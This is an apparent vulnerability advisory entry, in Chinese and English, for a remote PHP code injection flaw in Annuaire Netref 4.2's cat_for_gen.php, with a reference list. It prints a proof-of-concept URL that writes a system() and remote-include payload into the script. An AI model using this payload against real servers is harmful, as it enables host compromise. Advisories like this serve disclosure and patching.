https://www.exploit-db.com/exploits/25467
https://www.securityfocus.com/bid/90130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-800

AnnuaireNetref4.2中的cat_for_gen.php使得远程攻击者可以通过设置ad_direct参数来引用cat_for_gen.php，然后将该代码包含在m_for_racine参数中，之后代码再被写入cat_for_gen.php，从而执行任意PHP代码。

source: http://www.securityfocus.com/bid/13275/info

A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer. 

http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>

Netref Netref 4.2

来源:XF
名称:netref-catforgen-code-execution(20198)
链接:http://xforce.iss.net/xforce/xfdb/20198
来源:OSVDB
名称:15717
链接:http://www.osvdb.org/15717
来源:SECUNIA
名称:15040
链接:http://secunia.com/advisories/15040
来源:BUGTRAQ
名称:20050419AnnuaireNetrefv4.2[fwritephp]vulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111403947305600&w;=2